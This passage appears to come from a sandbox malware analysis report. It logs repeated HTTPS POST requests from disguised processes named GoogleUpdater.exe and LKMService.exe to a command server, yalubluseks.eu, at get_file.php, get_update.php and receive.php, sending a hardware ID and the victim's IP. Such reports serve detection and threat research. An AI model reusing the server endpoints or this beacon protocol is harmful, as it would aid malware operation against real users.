                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DHTdb2V14qAuKipCFUUfwUMK0tKZS1yotf9%2BfNjUaY%2Fgh6BbqECmVP2MIWPC9uhXzjYauNWO7SSoNrqv1vCDPZPVFncBAOqcriqxlwzwDMH%2FGVHd8Pz9uCNw7PcrcCrfLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cab72b9cc32a-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          132192.168.2.658699172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:51 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:51 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:51 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:45:51 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:51 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cjaqmbl79e9utMgqQU6NWiRw%2BPbXnzIIMlhZtcxZ%2B25H13z%2Bzx8c9eZOMWHTFAZ7SnR0bU%2FeoenhS2YKFSPSLxvUzid7KKMLeEZHsNHTsbr2JKO8ZzD9kmK8zU%2BjxyiDmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cabb8a8943f4-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          133192.168.2.658701172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:51 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:51 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:51 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:45:52 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:52 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zSQ5NxXQT3MiEx0iI2iNbLvw8%2BFFyp5uSZa6NorEA%2BHJIoRlxajFApeddSi2brFqe%2BgO3etzJCm470u0%2BvgbcxFWArd4g4oktp%2FEJtIzxiaOOnnrtyGS%2Biz7zSCRjbzCaw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cabfac3041e9-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          134192.168.2.658702172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:52 UTC146OUTPOST /get_update.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:52 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:52 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                                                                                                                                                                                                                                          Data Ascii: current_version=0.3
                                                                                                                                                                                                                                          2024-10-02 12:45:52 UTC609INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:52 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4OvWvMpsAh5StZkvX2Y7tGTDnYdDRBzjKzf2bGu4FRo6l%2BrzqMh%2BXp5Or8RjANyp%2BPtG4iUhxQRvbhi8cihviZcMR%2BGIAv2c1Uory1z8XyE5K4VjDQXeGkp7v2lyOURxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cac0aeef4385-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          135192.168.2.658703172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:52 UTC146OUTPOST /get_update.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:53 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:45:53 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                                                                                                                                                                                                                                          Data Ascii: current_version=0.3
                                                                                                                                                                                                                                          2024-10-02 12:45:53 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:53 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QMiUW1j6NizYr8%2BSaF1f0E%2F216tMknxBHF31GWzBHd1IQPgx7cUEoKjoh8prVnYeMFehvJ3ZmuotOA24dZIL0UFLcK55j5Aw%2FQC8vOZcyF5jXMan4GOOc1XTZpVYz7FbmQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cac53ff70c9e-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          136192.168.2.658705172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:45:58 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:45:58 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          137192.168.2.658708172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:46:05 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:46:05 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:46:05 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:46:06 UTC605INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:06 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q7IggCJkAGy0LSLKeHHreGNXfqZceXD4qrs4nHdjR4XPluk4Da99EVZqQbzmAMS%2FKvtHDmCvimiZlOrRJMQCXbwbP0fnspzJIL%2BvUMBLpPoUdBGVEo9IjQ88lu4i5eydOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb158c1a4362-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          138192.168.2.658709172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:46:05 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:46:06 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:46:06 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:46:06 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:06 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8YDSXh2FUb%2B2EoZVo4EF8OEa34Jna%2FQUrS6JgsVwS9N7SUV2XZHRP1WQJOpZlotd4NaBPegL33%2BxsXBNd6zuEyiq7DY%2Fwj7Z3bUp4IM%2FlzNHsXL4wBwgivgUoespuROQMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb177fda41ef-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          139192.168.2.658712172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:46:07 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:46:07 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:46:07 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:46:07 UTC603INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:07 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ElLOlwxpn4Hn7ymG0nKIEHYbnRIv9tmHfbBKplgHe6izYAHmQsd8SOI1q41ugkA94LEMCybmAevLI3DrqosgdVD11xxtt307aj%2FjRbX6XYALKENuCWbDnxGN518mRDTqHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb1e7d0842fb-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          140192.168.2.658713172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:46:07 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:46:07 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:46:07 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:46:07 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:07 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=21wZOiuxC9xJma8u4QkJXHxdeyHrldc57SCs3dMUrX%2Fk1Pt3orEAiSBnzSaYA6nklu%2BoaJn%2Ft9aYM%2Ff3RFWPGfdX3StZwQSclgC3%2FHcYjwXXqefg0LmNL5xwcPzuAH7SLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb20be4a423f-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          141192.168.2.658714172.67.140.924434340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:46:07 UTC146OUTPOST /get_update.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:46:07 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:46:07 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                                                                                                                                                                                                                                          Data Ascii: current_version=0.3
                                                                                                                                                                                                                                          2024-10-02 12:46:08 UTC609INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:08 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6BQCLU3%2FP0E97Fpmu0On0d%2BixY4DVktDLl%2FFP03qqNKPeMK3UZmvZTyLRvr8qV5I1OtXk7BD00KtgG1tAtJd1XBJXw27y0RbyXdEZCpPZwBBjnM%2BziUoQ5RWCdUWKPuxbw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb23af3fc3f3-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          142192.168.2.658715172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:46:08 UTC146OUTPOST /get_update.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:46:08 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:46:08 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                                                                                                                                                                                                                                          Data Ascii: current_version=0.3
                                                                                                                                                                                                                                          2024-10-02 12:46:08 UTC605INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:08 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z2TS677%2FNeU56aorEs4N2QD95vUwqJUKOD4mem4Ho%2BtEHpucbJK9q00ckHMCFlTBKKh3ivDXv1hdFEYzWdgXs8fhO3LpjewR7ESGjDPaQM3Uar58W0JhyAAuVHS0lDvgLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb25292f727a-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          143192.168.2.658717172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:46:12 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:46:12 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:46:12 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:46:13 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:13 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GcIIbrekpMvb7cZU49HeiCTZC3qDAjecpMxo%2ByACgN6STQkaioHRDcKGXwC8ehJbH2J7qWO%2FxMqDXSaGJgzOibzM%2B9JxApOJbgAkvWxK9rHLF3CGlrDXFFs63zbTPj1N4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4cb4218283320-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          144192.168.2.658720172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:46:16 UTC143OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:46:16 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:46:16 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:46:17 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:46:17 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
